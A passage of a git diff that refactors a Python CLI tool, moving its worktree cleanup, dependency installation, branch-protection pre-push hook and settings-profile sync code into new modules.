run complete. No changes made.[/dim]") - return True - - # Remove worktree - with console.status("[cyan]Removing worktree...[/cyan]", spinner=Spinners.DEFAULT): - try: - force_flag = ["--force"] if force else [] - subprocess.run( - ["git", "-C", str(repo_path), "worktree", "remove", str(worktree_path)] - + force_flag, - check=True, - capture_output=True, - timeout=30, - ) - except subprocess.CalledProcessError: - # Fallback: manual removal - shutil.rmtree(worktree_path, ignore_errors=True) - subprocess.run( - ["git", "-C", str(repo_path), "worktree", "prune"], - capture_output=True, - timeout=10, - ) - - console.print(f" [green]{Indicators.get('PASS')}[/green] Worktree removed") - - # Ask about branch deletion (auto-delete if --yes was provided) - console.print() - branch_deleted = False - should_delete_branch = skip_confirm or confirm_with_layout( - console, - f"[cyan]Also delete branch '{branch_name}'?[/cyan]", - default=False, - ) - if should_delete_branch: - with console.status("[cyan]Deleting branch...[/cyan]", spinner=Spinners.DEFAULT): - subprocess.run( - ["git", "-C", str(repo_path), "branch", "-D", branch_name], - capture_output=True, - timeout=10, - ) - console.print(f" [green]{Indicators.get('PASS')}[/green] Branch deleted") - branch_deleted = True - - console.print() - console.print( - create_success_panel( - "Cleanup Complete", - { - "Removed": str(worktree_path), - "Branch": "deleted" if branch_deleted else "kept", - }, - ) - ) - - return True - - -# ═══════════════════════════════════════════════════════════════════════════════ -# Dependency Installation -# ═══════════════════════════════════════════════════════════════════════════════ - - -def _run_install_cmd( - cmd: list[str], - path: Path, - console: Console | None, - timeout: int = 300, -) -> bool: - """Run an install command and warn on failure. Returns True if successful.""" - try: - result = subprocess.run(cmd, cwd=path, capture_output=True, text=True, timeout=timeout) - if result.returncode != 0 and console: - error_detail = result.stderr.strip() if result.stderr else "" - message = f"'{' '.join(cmd)}' failed with exit code {result.returncode}" - if error_detail: - message += f": {error_detail[:100]}" # Truncate long errors - console.print( - create_warning_panel( - "Dependency Install Warning", - message, - "You may need to install dependencies manually", - ) - ) - return False - return True - except subprocess.TimeoutExpired: - if console: - console.print( - create_warning_panel( - "Dependency Install Timeout", - f"'{' '.join(cmd)}' timed out after {timeout}s", - "You may need to install dependencies manually", - ) - ) - return False - - -def install_dependencies(path: Path, console: Console | None = None) -> bool: - """Detect and install project dependencies. - - Support Node.js (npm/yarn/pnpm/bun), Python (pip/poetry/uv), and - Java (Maven/Gradle). Warn user if any install fails rather than - silently ignoring. - - Args: - path: Path to the project directory. - console: Rich console for output (optional). - """ - success = True - - # Node.js - if (path / "package.json").exists(): - if (path / "pnpm-lock.yaml").exists(): - cmd = ["pnpm", "install"] - elif (path / "bun.lockb").exists(): - cmd = ["bun", "install"] - elif (path / "yarn.lock").exists(): - cmd = ["yarn", "install"] - else: - cmd = ["npm", "install"] - - success = _run_install_cmd(cmd, path, console, timeout=300) and success - - # Python - if (path / "pyproject.toml").exists(): - if shutil.which("poetry"): - success = ( - _run_install_cmd(["poetry", "install"], path, console, timeout=300) and success - ) - elif shutil.which("uv"): - success = ( - _run_install_cmd(["uv", "pip", "install", "-e", "."], path, console, timeout=300) - and success - ) - elif (path / "requirements.txt").exists(): - success = ( - _run_install_cmd( - ["pip", "install", "-r", "requirements.txt"], - path, - console, - timeout=300, - ) - and success - ) - - # Java/Maven - if (path / "pom.xml").exists(): - success = ( - _run_install_cmd(["mvn", "dependency:resolve"], path, console, timeout=600) and success - ) - - # Java/Gradle - if (path / "build.gradle").exists() or (path / "build.gradle.kts").exists(): - gradle_cmd = "./gradlew" if (path / "gradlew").exists() else "gradle" - success = ( - _run_install_cmd([gradle_cmd, "dependencies"], path, console, timeout=600) and success - ) - - return success - - -# ═══════════════════════════════════════════════════════════════════════════════ +# ═════════════════════════���═════════════════════════════════════════════════════ # Repository Cloning # ═══════════════════════════════════════════════════════════════════════════════ @@ -792,93 +541,3 @@ def clone_repo(url: str, base_path: str, console: Console | None = None) -> str: ) return str(target) - - -# ═══════════════════════════════════════════════════════════════════════════════ -# Git Hooks Installation -# ═══════════════════════════════════════════════════════════════════════════════ - - -def install_hooks(console: Console) -> None: - """Install global git hooks for branch protection. - - Configure the global core.hooksPath and install a pre-push hook - that prevents direct pushes to protected branches. - - Args: - console: Rich console for output. - """ - - hooks_dir = Path.home() / ".config" / "git" / "hooks" - hooks_dir.mkdir(parents=True, exist_ok=True) - - pre_push_content = """#!/bin/bash -# SCC - Pre-push hook -# Prevents direct pushes to protected branches - -PROTECTED_BRANCHES="main master develop production staging" - -current_branch=$(git symbolic-ref HEAD 2>/dev/null | sed -e 's,.*/\\(.*\\),\\1,') - -for protected in $PROTECTED_BRANCHES; do - if [ "$current_branch" = "$protected" ]; then - echo "" - echo "BLOCKED: Direct push to '$protected' is not allowed" - echo "" - echo "Please push to a feature branch instead:" - echo " git checkout -b scc/" - echo " git push -u origin scc/" - echo "" - exit 1 - fi -done - -while read local_ref local_sha remote_ref remote_sha; do - remote_branch=$(echo "$remote_ref" | sed -e 's,.*/\\(.*\\),\\1,') - - for protected in $PROTECTED_BRANCHES; do - if [ "$remote_branch" = "$protected" ]; then - echo "" - echo "BLOCKED: Push to protected branch '$protected'" - echo "" - exit 1 - fi - done -done - -exit 0 -""" - - pre_push_path = hooks_dir / "pre-push" - - console.print() - console.print( - create_info_panel( - "Installing Git Hooks", - "Branch protection hooks will be installed globally", - f"Location: {hooks_dir}", - ) - ) - console.print() - - with console.status("[cyan]Installing hooks...[/cyan]", spinner=Spinners.SETUP): - pre_push_path.write_text(pre_push_content) - pre_push_path.chmod(0o755) - - # Configure git to use global hooks - subprocess.run( - ["git", "config", "--global", "core.hooksPath", str(hooks_dir)], - capture_output=True, - ) - - console.print(f" [green]{Indicators.get('PASS')}[/green] Pre-push hook installed") - console.print() - console.print( - create_success_panel( - "Hooks Installed", - { - "Location": str(hooks_dir), - "Protected branches": "main, master, develop, production, staging", - }, - ) - ) diff --git a/src/scc_cli/ui/git_interactive_ops.py b/src/scc_cli/ui/git_interactive_ops.py new file mode 100644 index 0000000..4fb4be1 --- /dev/null +++ b/src/scc_cli/ui/git_interactive_ops.py @@ -0,0 +1,381 @@ +"""Git interactive operations — cleanup, hooks, and dependency installation. + +Extracted from git_interactive.py to keep that module focused on +worktree creation, branch safety, and repository cloning. +""" + +from __future__ import annotations + +import shutil +import subprocess +from pathlib import Path +from typing import TYPE_CHECKING, Any + +from rich.console import Console +from rich.text import Text +from rich.tree import Tree + +from ..core.constants import WORKTREE_BRANCH_PREFIX +from ..panels import ( + create_info_panel, + create_success_panel, + create_warning_panel, +) +from ..services.git.branch import ( + get_uncommitted_files, + sanitize_branch_name, +) +from ..theme import Indicators, Spinners + +if TYPE_CHECKING: + pass + + +def _get_confirm_with_layout() -> Any: + """Late-bound lookup through git_interactive for test-patch compatibility.""" + from . import git_interactive as _gi_mod + + return _gi_mod.confirm_with_layout + + +def cleanup_worktree( + repo_path: Path, + name: str, + force: bool, + console: Console, + *, + skip_confirm: bool = False, + dry_run: bool = False, +) -> bool: + """Clean up a worktree with safety checks and visual feedback. + + Show uncommitted changes before deletion to prevent accidental data loss. + + Args: + repo_path: Path to the main repository. + name: Name of the worktree to remove. + force: If True, remove even if worktree has uncommitted changes. + console: Rich console for output. + skip_confirm: If True, skip interactive confirmations (--yes flag). + dry_run: If True, show what would be removed but don't actually remove. + + Returns: + True if worktree was removed (or would be in dry-run mode), False otherwise. + """ + safe_name = sanitize_branch_name(name) + branch_name = f"{WORKTREE_BRANCH_PREFIX}{safe_name}" + worktree_base = repo_path.parent / f"{repo_path.name}-worktrees" + worktree_path = worktree_base / safe_name + + if not worktree_path.exists(): + console.print() + console.print( + create_warning_panel( + "Worktree Not Found", + f"No worktree found at: {worktree_path}", + "Use 'scc worktrees ' to list available worktrees", + ) + ) + return False + + console.print() + if dry_run: + console.print( + create_info_panel( + "Dry Run: Cleanup Worktree", + f"Worktree: {safe_name}", + f"Path: {worktree_path}", + ) + ) + else: + console.print( + create_info_panel( + "Cleanup Worktree", f"Worktree: {safe_name}", f"Path: {worktree_path}" + ) + ) + console.print() + + # Check for uncommitted changes - show evidence + if not force: + uncommitted = get_uncommitted_files(worktree_path) + + if uncommitted: + # Build a tree of files that will be lost + tree = Tree(f"[red bold]Uncommitted Changes ({len(uncommitted)})[/red bold]") + + for f in uncommitted[:10]: # Show max 10 + tree.add(Text(f, style="dim")) + + if len(uncommitted) > 10: + tree.add(Text(f"...and {len(uncommitted) - 10} more", style="dim italic")) + + console.print(tree) + console.print() + console.print("[red bold]These changes will be permanently lost.[/red bold]") + console.print() + + # Skip confirmation prompt if --yes was provided + if not skip_confirm: + if not _get_confirm_with_layout()( + console, + "[yellow]Delete worktree anyway?[/yellow]", + default=False, + ): + console.print("[dim]Cleanup cancelled.[/dim]") + return False + + # Dry run: show what would be removed without actually removing + if dry_run: + console.print(" [cyan]Would remove:[/cyan]") + console.print(f" - Worktree: {worktree_path}") + console.print(f" - Branch: {branch_name} [dim](if confirmed)[/dim]") + console.print() + console.print("[dim]Dry run complete. No changes made.[/dim]") + return True + + # Remove worktree + with console.status("[cyan]Removing worktree...[/cyan]", spinner=Spinners.DEFAULT): + try: + force_flag = ["--force"] if force else [] + subprocess.run( + ["git", "-C", str(repo_path), "worktree", "remove", str(worktree_path)] + + force_flag, + check=True, + capture_output=True, + timeout=30, + ) + except subprocess.CalledProcessError: + # Fallback: manual removal + shutil.rmtree(worktree_path, ignore_errors=True) + subprocess.run( + ["git", "-C", str(repo_path), "worktree", "prune"], + capture_output=True, + timeout=10, + ) + + console.print(f" [green]{Indicators.get('PASS')}[/green] Worktree removed") + + # Ask about branch deletion (auto-delete if --yes was provided) + console.print() + branch_deleted = False + should_delete_branch = skip_confirm or _get_confirm_with_layout()( + console, + f"[cyan]Also delete branch '{branch_name}'?[/cyan]", + default=False, + ) + if should_delete_branch: + with console.status("[cyan]Deleting branch...[/cyan]", spinner=Spinners.DEFAULT): + subprocess.run( + ["git", "-C", str(repo_path), "branch", "-D", branch_name], + capture_output=True, + timeout=10, + ) + console.print(f" [green]{Indicators.get('PASS')}[/green] Branch deleted") + branch_deleted = True + + console.print() + console.print( + create_success_panel( + "Cleanup Complete", + { + "Removed": str(worktree_path), + "Branch": "deleted" if branch_deleted else "kept", + }, + ) + ) + + return True + + +# ═══════════════════════════════════════════════════════════════════════════════ +# Dependency Installation +# ═══════════════════════════════════════════════════════════════════════════════ + + +def _run_install_cmd( + cmd: list[str], + path: Path, + console: Console | None, + timeout: int = 300, +) -> bool: + """Run an install command and warn on failure. Returns True if successful.""" + try: + result = subprocess.run(cmd, cwd=path, capture_output=True, text=True, timeout=timeout) + if result.returncode != 0 and console: + error_detail = result.stderr.strip() if result.stderr else "" + message = f"'{' '.join(cmd)}' failed with exit code {result.returncode}" + if error_detail: + message += f": {error_detail[:100]}" # Truncate long errors + console.print( + create_warning_panel( + "Dependency Install Warning", + message, + "You may need to install dependencies manually", + ) + ) + return False + return True + except subprocess.TimeoutExpired: + if console: + console.print( + create_warning_panel( + "Dependency Install Timeout", + f"'{' '.join(cmd)}' timed out after {timeout}s", + "You may need to install dependencies manually", + ) + ) + return False + + +def install_dependencies(path: Path, console: Console | None = None) -> bool: + """Detect and install project dependencies. + + Support Node.js (npm/yarn/pnpm/bun), Python (pip/poetry/uv), and + Java (Maven/Gradle). Warn user if any install fails rather than + silently ignoring. + + Args: + path: Path to the project directory. + console: Rich console for output (optional). + """ + success = True + + # Node.js + if (path / "package.json").exists(): + if (path / "pnpm-lock.yaml").exists(): + cmd = ["pnpm", "install"] + elif (path / "bun.lockb").exists(): + cmd = ["bun", "install"] + elif (path / "yarn.lock").exists(): + cmd = ["yarn", "install"] + else: + cmd = ["npm", "install"] + + success = _run_install_cmd(cmd, path, console, timeout=300) and success + + # Python + if (path / "pyproject.toml").exists(): + if shutil.which("poetry"): + success = ( + _run_install_cmd(["poetry", "install"], path, console, timeout=300) and success + ) + elif shutil.which("uv"): + success = ( + _run_install_cmd(["uv", "pip", "install", "-e", "."], path, console, timeout=300) + and success + ) + elif (path / "requirements.txt").exists(): + success = ( + _run_install_cmd( + ["pip", "install", "-r", "requirements.txt"], + path, + console, + timeout=300, + ) + and success + ) + + # Java/Maven + if (path / "pom.xml").exists(): + success = ( + _run_install_cmd(["mvn", "dependency:resolve"], path, console, timeout=600) and success + ) + + # Java/Gradle + if (path / "build.gradle").exists() or (path / "build.gradle.kts").exists(): + gradle_cmd = "./gradlew" if (path / "gradlew").exists() else "gradle" + success = ( + _run_install_cmd([gradle_cmd, "dependencies"], path, console, timeout=600) and success + ) + + return success + + +# ═══════════════════════════════════════════════════════════════════════════════ +# Git Hooks Installation +# ═══════════════════════════════════════════════════════════════════════════════ + + +def install_hooks(console: Console) -> None: + """Install global git hooks for branch protection. + + Configure the global core.hooksPath and install a pre-push hook + that prevents direct pushes to protected branches. + + Args: + console: Rich console for output. + """ + + hooks_dir = Path.home() / ".config" / "git" / "hooks" + hooks_dir.mkdir(parents=True, exist_ok=True) + + pre_push_content = """#!/bin/bash +# SCC - Pre-push hook +# Prevents direct pushes to protected branches + +PROTECTED_BRANCHES="main master develop production staging" + +current_branch=$(git symbolic-ref HEAD 2>/dev/null | sed -e 's,.*/\\(.*\\),\\1,') + +for protected in $PROTECTED_BRANCHES; do + if [ "$current_branch" = "$protected" ]; then + echo "" + echo "BLOCKED: Direct push to '$protected' is not allowed" + echo "" + echo "Please push to a feature branch instead:" + echo " git checkout -b scc/" + echo " git push -u origin scc/" + echo "" + exit 1 + fi +done + +while read local_ref local_sha remote_ref remote_sha; do + remote_branch=$(echo "$remote_ref" | sed -e 's,.*/\\(.*\\),\\1,') + + for protected in $PROTECTED_BRANCHES; do + if [ "$remote_branch" = "$protected" ]; then + echo "" + echo "BLOCKED: Push to protected branch '$protected'" + echo "" + exit 1 + fi + done +done + +exit 0 +""" + + pre_push_path = hooks_dir / "pre-push" + + console.print() + console.print( + create_info_panel( + "Installing Git Hooks", + "Branch protection hooks will be installed globally", + f"Location: {hooks_dir}", + ) + ) + console.print() + + with console.status("[cyan]Installing hooks...[/cyan]", spinner=Spinners.SETUP): + pre_push_path.write_text(pre_push_content) + pre_push_path.chmod(0o755) + + # Configure git to use global hooks + subprocess.run( + ["git", "config", "--global", "core.hooksPath", str(hooks_dir)], + capture_output=True, + ) + + console.print(f" [green]{Indicators.get('PASS')}[/green] Pre-push hook installed") + console.print() + console.print( + create_success_panel( + "Hooks Installed", + { + "Location": str(hooks_dir), + "Protected branches": "main, master, develop, production, staging", + }, + ) + ) diff --git a/src/scc_cli/ui/settings.py b/src/scc_cli/ui/settings.py index 8a2d1e4..97b38c2 100644 --- a/src/scc_cli/ui/settings.py +++ b/src/scc_cli/ui/settings.py @@ -29,9 +29,6 @@ DoctorInfo, PathsInfo, ProfileDiffInfo, - ProfileSyncMode, - ProfileSyncPathPayload, - ProfileSyncPayload, ProfileSyncPreview, ProfileSyncResult, SettingsAction, @@ -476,7 +473,7 @@ def _show_paths_info(self, paths_info: PathsInfo) -> None: def _generate_support_bundle(self) -> str | None: """Generate a support bundle for troubleshooting.""" - from scc_cli.support_bundle import get_default_bundle_path + from scc_cli.application.support_bundle import get_default_support_bundle_path self._console.print() self._console.print("[bold]Generate Support Bundle[/bold]") @@ -487,7 +484,7 @@ def _generate_support_bundle(self) -> str | None: ) self._console.print() - default_path = get_default_bundle_path() + default_path = get_default_support_bundle_path() path_str = Prompt.ask("Save bundle to", default=str(default_path)) if not path_str: @@ -518,314 +515,28 @@ def _show_version_info(self, version_info: VersionInfo) -> None: def _profile_diff(self, diff_info: ProfileDiffInfo) -> None: """Show diff between profile and workspace settings with visual overlay.""" - from rich import box - - diff = diff_info.diff - if diff.is_empty: - self._console.print() - self._console.print("[green]✓ Profile is in sync with workspace[/green]") - return None - - lines: list[str] = [] - current_section = "" - rendered_lines = 0 - max_lines = 12 - truncated = False - - indicators = { - "added": "[green]+[/green]", - "removed": "[red]−[/red]", - "modified": "[yellow]~[/yellow]", - } - - section_names = { - "plugins": "plugins", - "mcp_servers": "mcp_servers", - "marketplaces": "marketplaces", - } - - for item in diff.items: - if rendered_lines >= max_lines and not truncated: - truncated = True - break - - if item.section != current_section: - if current_section: - lines.append("") - rendered_lines += 1 - lines.append(f" [bold]{section_names.get(item.section, item.section)}[/bold]") - rendered_lines += 1 - current_section = item.section - - indicator = indicators.get(item.status, " ") - modifier = "(modified)" if item.status == "modified" else "" - if modifier: - lines.append(f" {indicator} {item.name} [dim]{modifier}[/dim]") - else: - lines.append(f" {indicator} {item.name}") - rendered_lines += 1 - - if truncated: - remaining = diff.total_count - ( - rendered_lines - len(set(i.section for i in diff.items)) - ) - lines.append("") - lines.append(f" [dim]+ {remaining} more items...[/dim]") + from .settings_profile import profile_diff - lines.append("") - lines.append(f" [dim]{diff.total_count} difference(s) · Esc close[/dim]") - - content = "\n".join(lines) - - self._console.print() - self._console.print( - Panel( - content, - title="[bold]Profile Diff[/bold]", - border_style="bright_black", - box=box.ROUNDED, - padding=(1, 2), - ) - ) - - return None + profile_diff(self._console, diff_info) def _profile_sync(self) -> str | None: """Sync profiles with a repository using overlay picker.""" - from pathlib import Path - - from .list_screen import ListItem, ListScreen + from .settings_profile import profile_sync self._refresh_view_model() - default_path = self._view_model.sync_repo_path - - items: list[ListItem[str]] = [ - ListItem( - value="change_path", - label=f"📁 {default_path}", - description="Change path", - ), - ListItem( - value="export", - label="Export", - description="Save profiles to folder", - ), - ListItem( - value="import", - label="Import", - description="Load profiles from folder", - ), - ListItem( - value="full_sync", - label="Full sync", - description="Load then save (advanced)", - ), - ] - - # Show picker with styled title (matching dashboard pattern) - screen = ListScreen(items, title="[cyan]Sync[/cyan] Profiles") - selected = screen.run() - - if not selected: - return None - - repo_path = Path(default_path).expanduser() - - # Handle path change - if selected == "change_path": - return self._sync_change_path(default_path) - - # Handle export - if selected == "export": - return self._sync_export(repo_path) - - # Handle import - if selected == "import": - return self._sync_import(repo_path) - - # Handle full sync - if selected == "full_sync": - return self._sync_full(repo_path) - - return None - - def _sync_change_path(self, current_path: str) -> str | None: - """Handle path editing for sync.""" - from rich import box - - self._console.print() - panel = Panel( - f"[dim]Current:[/dim] {current_path}\n\n" - "[dim]Enter new path or press Enter to keep current[/dim]", - title="[cyan]Edit[/cyan] Repository Path", - border_style="cyan", - box=box.ROUNDED, - padding=(1, 2), + return profile_sync( + self._console, + self._context, + self._view_model, + refresh_view_model=self._refresh_view_model, + handle_action_result=self._handle_action_result, + render_profile_sync_preview=self._render_profile_sync_preview, ) - self._console.print(panel) - new_path = Prompt.ask("[cyan]Path[/cyan]", default=current_path) - - if new_path and new_path != current_path: - result = app_settings.apply_settings_change( - SettingsChangeRequest( - action_id="profile_sync", - workspace=self._context.workspace, - payload=ProfileSyncPathPayload(new_path=new_path), - ) - ) - self._handle_action_result(result) - self._refresh_view_model() - - return self._profile_sync() - - def _sync_export(self, repo_path: Path) -> str | None: - """Export profiles to repository.""" - payload = ProfileSyncPayload(mode=ProfileSyncMode.EXPORT, repo_path=repo_path) - validation = app_settings.validate_settings( - SettingsValidationRequest( - action_id="profile_sync", - workspace=self._context.workspace, - payload=payload, - ) - ) - if validation and validation.error: - self._console.print(f"[yellow]{validation.error}[/yellow]") - Prompt.ask("[dim]Press Enter to continue[/dim]", default="") - return None - - create_dir = False - if ( - validation - and validation.confirmation == ConfirmationKind.CONFIRM - and validation.message - ): - create_dir = self._confirm_create_directory(validation.message) - if not create_dir: - return None - - self._console.print(f"[dim]Exporting to {repo_path}...[/dim]") - payload = ProfileSyncPayload( - mode=ProfileSyncMode.EXPORT, - repo_path=repo_path, - create_dir=create_dir, - ) - result = app_settings.apply_settings_change( - SettingsChangeRequest( - action_id="profile_sync", - workspace=self._context.workspace, - payload=payload, - ) - ) - message = self._handle_action_result(result) - self._refresh_view_model() - return message - - def _sync_import(self, repo_path: Path) -> str | None: - """Import profiles from repository with preview.""" - from rich import box - - self._console.print(f"[dim]Checking {repo_path}...[/dim]") - payload = ProfileSyncPayload(mode=ProfileSyncMode.IMPORT, repo_path=repo_path) - validation = app_settings.validate_settings( - SettingsValidationRequest( - action_id="profile_sync", - workspace=self._context.workspace, - payload=payload, - ) - ) - - if validation and validation.error: - self._console.print( - Panel( - f"[yellow]✗ {validation.error}[/yellow]", - title="[cyan]Sync[/cyan] Profiles", - border_style="bright_black", - box=box.ROUNDED, - padding=(1, 2), - ) - ) - Prompt.ask("[dim]Press Enter to continue[/dim]", default="") - return None - - confirmed = True - if validation and isinstance(validation.detail, ProfileSyncPreview): - self._render_profile_sync_preview(validation.detail) - confirmed = Confirm.ask("Import now?", default=True) - if not confirmed: - return None - - result = app_settings.apply_settings_change( - SettingsChangeRequest( - action_id="profile_sync", - workspace=self._context.workspace, - payload=payload, - confirmed=confirmed, - ) - ) - message = self._handle_action_result(result) - self._refresh_view_model() - return message - - def _sync_full(self, repo_path: Path) -> str | None: - """Full sync: import then export.""" - self._console.print(f"[dim]Full sync with {repo_path}...[/dim]") - payload = ProfileSyncPayload(mode=ProfileSyncMode.FULL_SYNC, repo_path=repo_path) - result = app_settings.apply_settings_change( - SettingsChangeRequest( - action_id="profile_sync", - workspace=self._context.workspace, - payload=payload, - ) - ) - message = self._handle_action_result(result) - self._refresh_view_model() - return message def _render_profile_sync_result(self, result: ProfileSyncResult) -> None: - from rich import box - - lines: list[str] = [] - if result.mode == ProfileSyncMode.EXPORT: - lines.append(f"[green]✓ Exported {result.exported} profile(s)[/green]") - for profile_id in result.profile_ids: - lines.append(f" [green]+[/green] {profile_id}") - if result.warnings: - lines.append("") - for warning in result.warnings: - lines.append(f" [yellow]![/yellow] {warning}") - lines.append("") - lines.append("[dim]Files written locally · no git commit/push[/dim]") - lines.append("[dim]For git: scc profile export --repo PATH --commit --push[/dim]") - - if result.mode == ProfileSyncMode.IMPORT: - lines.append(f"[green]✓ Imported {result.imported} profile(s)[/green]") - if result.warnings: - lines.append("") - for warning in result.warnings: - lines.append(f" [yellow]![/yellow] {warning}") - lines.append("") - lines.append("[dim]Profiles copied locally · no git pull[/dim]") - lines.append("[dim]For git: scc profile import --repo PATH --pull[/dim]") - - if result.mode == ProfileSyncMode.FULL_SYNC: - lines.append("[green]✓ Sync complete[/green]") - lines.append("") - lines.append(f" Imported: {result.imported} profile(s)") - lines.append(f" Exported: {result.exported} profile(s)") - lines.append("") - lines.append("[dim]Files synced locally · no git operations[/dim]") - lines.append("[dim]For git: scc profile sync --repo PATH --pull --commit --push[/dim]") + from .settings_profile import render_profile_sync_result - self._console.print() - self._console.print( - Panel( - "\n".join(lines), - title="[cyan]Sync[/cyan] Profiles", - border_style="bright_black", - box=box.ROUNDED, - padding=(1, 2), - ) - ) + render_profile_sync_result(self._console, result) def _render_support_bundle_result(self, info: SupportBundleInfo) -> None: self._console.print() diff --git a/src/scc_cli/ui/settings_profile.py b/src/scc_cli/ui/settings_profile.py new file mode 100644 index 0000000..94285d4 --- /dev/null +++ b/src/scc_cli/ui/settings_profile.py @@ -0,0 +1,410 @@ +"""Profile-related operations for the Settings screen. + +Extracted from settings.py: _profile_diff, _profile_sync, and _sync_* +helpers. These functions receive the console and context explicitly +rather than through `self`. +""" + +from __future__ import annotations + +from collections.abc import Callable +from pathlib import Path + +from rich import box +from rich.console import Console +from rich.panel import Panel +from rich.prompt import Confirm, Prompt + +from scc_cli.application import settings as app_settings +from scc_cli.application.settings import ( + ConfirmationKind, + ProfileDiffInfo, + ProfileSyncMode, + ProfileSyncPathPayload, + ProfileSyncPayload, + ProfileSyncPreview, + ProfileSyncResult, + SettingsActionResult, + SettingsChangeRequest, + SettingsContext, + SettingsValidationRequest, +) + + +def profile_diff(console: Console, diff_info: ProfileDiffInfo) -> None: + """Show diff between profile and workspace settings with visual overlay.""" + diff = diff_info.diff + if diff.is_empty: + console.print() + console.print("[green]✓ Profile is in sync with workspace[/green]") + return None + + lines: list[str] = [] + current_section = "" + rendered_lines = 0 + max_lines = 12 + truncated = False + + indicators = { + "added": "[green]+[/green]", + "removed": "[red]−[/red]", + "modified": "[yellow]~[/yellow]", + } + + section_names = { + "plugins": "plugins", + "mcp_servers": "mcp_servers", + "marketplaces": "marketplaces", + } + + for item in diff.items: + if rendered_lines >= max_lines and not truncated: + truncated = True + break + + if item.section != current_section: + if current_section: + lines.append("") + rendered_lines += 1 + lines.append(f" [bold]{section_names.get(item.section, item.section)}[/bold]") + rendered_lines += 1 + current_section = item.section + + indicator = indicators.get(item.status, " ") + modifier = "(modified)" if item.status == "modified" else "" + if modifier: + lines.append(f" {indicator} {item.name} [dim]{modifier}[/dim]") + else: + lines.append(f" {indicator} {item.name}") + rendered_lines += 1 + + if truncated: + remaining = diff.total_count - (rendered_lines - len(set(i.section for i in diff.items))) + lines.append("") + lines.append(f" [dim]+ {remaining} more items...[/dim]") + + lines.append("") + lines.append(f" [dim]{diff.total_count} difference(s) · Esc close[/dim]") + + content = "\n".join(lines) + + console.print() + console.print( + Panel( + content, + title="[bold]Profile Diff[/bold]", + border_style="bright_black", + box=box.ROUNDED, + padding=(1, 2), + ) + ) + + return None + + +def profile_sync( + console: Console, + context: SettingsContext, + view_model: app_settings.SettingsViewModel, + refresh_view_model: Callable[[], None], + handle_action_result: Callable[[SettingsActionResult], str | None], + render_profile_sync_preview: Callable[[ProfileSyncPreview], None], +) -> str | None: + """Sync profiles with a repository using overlay picker.""" + from .list_screen import ListItem, ListScreen + + default_path = view_model.sync_repo_path + + items: list[ListItem[str]] = [ + ListItem( + value="change_path", + label=f"📁 {default_path}", + description="Change path", + ), + ListItem( + value="export", + label="Export", + description="Save profiles to folder", + ), + ListItem( + value="import", + label="Import", + description="Load profiles from folder", + ), + ListItem( + value="full_sync", + label="Full sync", + description="Load then save (advanced)", + ), + ] + + screen = ListScreen(items, title="[cyan]Sync[/cyan] Profiles") + selected = screen.run() + + if not selected: + return None + + repo_path = Path(default_path).expanduser() + + if selected == "change_path": + return _sync_change_path( + console, + context, + default_path, + refresh_view_model=refresh_view_model, + handle_action_result=handle_action_result, + profile_sync_fn=lambda: profile_sync( + console, + context, + view_model, + refresh_view_model, + handle_action_result, + render_profile_sync_preview, + ), + ) + if selected == "export": + return _sync_export( + console, + context, + repo_path, + handle_action_result=handle_action_result, + refresh_view_model=refresh_view_model, + ) + if selected == "import": + return _sync_import( + console, + context, + repo_path, + handle_action_result=handle_action_result, + refresh_view_model=refresh_view_model, + render_profile_sync_preview=render_profile_sync_preview, + ) + if selected == "full_sync": + return _sync_full( + console, + context, + repo_path, + handle_action_result=handle_action_result, + refresh_view_model=refresh_view_model, + ) + + return None + + +def _confirm_create_directory(console: Console, message: str) -> bool: + """Confirm directory creation.""" + path = message.replace("Create directory?", "").strip() + console.print() + panel = Panel( + f"[yellow]Path does not exist:[/yellow]\n {path}", + title="[cyan]Create[/cyan] Directory", + border_style="yellow", + box=box.ROUNDED, + padding=(1, 2), + ) + console.print(panel) + return Confirm.ask("[cyan]Create directory?[/cyan]", default=True) + + +def _sync_change_path( + console: Console, + context: SettingsContext, + current_path: str, + *, + refresh_view_model: Callable[[], None], + handle_action_result: Callable[[SettingsActionResult], str | None], + profile_sync_fn: Callable[[], str | None], +) -> str | None: + """Handle path editing for sync.""" + console.print() + panel = Panel( + f"[dim]Current:[/dim] {current_path}\n\n" + "[dim]Enter new path or press Enter to keep current[/dim]", + title="[cyan]Edit[/cyan] Repository Path", + border_style="cyan", + box=box.ROUNDED, + padding=(1, 2), + ) + console.print(panel) + new_path = Prompt.ask("[cyan]Path[/cyan]", default=current_path) + + if new_path and new_path != current_path: + result = app_settings.apply_settings_change( + SettingsChangeRequest( + action_id="profile_sync", + workspace=context.workspace, + payload=ProfileSyncPathPayload(new_path=new_path), + ) + ) + handle_action_result(result) + refresh_view_model() + + return profile_sync_fn() + + +def _sync_export( + console: Console, + context: SettingsContext, + repo_path: Path, + *, + handle_action_result: Callable[[SettingsActionResult], str | None], + refresh_view_model: Callable[[], None], +) -> str | None: + """Export profiles to repository.""" + payload = ProfileSyncPayload(mode=ProfileSyncMode.EXPORT, repo_path=repo_path) + validation = app_settings.validate_settings( + SettingsValidationRequest( + action_id="profile_sync", + workspace=context.workspace, + payload=payload, + ) + ) + if validation and validation.error: + console.print(f"[yellow]{validation.error}[/yellow]") + Prompt.ask("[dim]Press Enter to continue[/dim]", default="") + return None + + create_dir = False + if validation and validation.confirmation == ConfirmationKind.CONFIRM and validation.message: + create_dir = _confirm_create_directory(console, validation.message) + if not create_dir: + return None + + console.print(f"[dim]Exporting to {repo_path}...[/dim]") + payload = ProfileSyncPayload( + mode=ProfileSyncMode.EXPORT, + repo_path=repo_path, + create_dir=create_dir, + ) + result = app_settings.apply_settings_change( + SettingsChangeRequest( + action_id="profile_sync", + workspace=context.workspace, + payload=payload, + ) + ) + message = handle_action_result(result) + refresh_view_model() + return message + + +def _sync_import( + console: Console, + context: SettingsContext, + repo_path: Path, + *, + handle_action_result: Callable[[SettingsActionResult], str | None], + refresh_view_model: Callable[[], None], + render_profile_sync_preview: Callable[[ProfileSyncPreview], None], +) -> str | None: + """Import profiles from repository with preview.""" + console.print(f"[dim]Checking {repo_path}...[/dim]") + payload = ProfileSyncPayload(mode=ProfileSyncMode.IMPORT, repo_path=repo_path) + validation = app_settings.validate_settings( + SettingsValidationRequest( + action_id="profile_sync", + workspace=context.workspace, + payload=payload, + ) + ) + + if validation and validation.error: + console.print( + Panel( + f"[yellow]✗ {validation.error}[/yellow]", + title="[cyan]Sync[/cyan] Profiles", + border_style="bright_black", + box=box.ROUNDED, + padding=(1, 2), + ) + ) + Prompt.ask("[dim]Press Enter to continue[/dim]", default="") + return None + + confirmed = True + if validation and isinstance(validation.detail, ProfileSyncPreview): + render_profile_sync_preview(validation.detail) + confirmed = Confirm.ask("Import 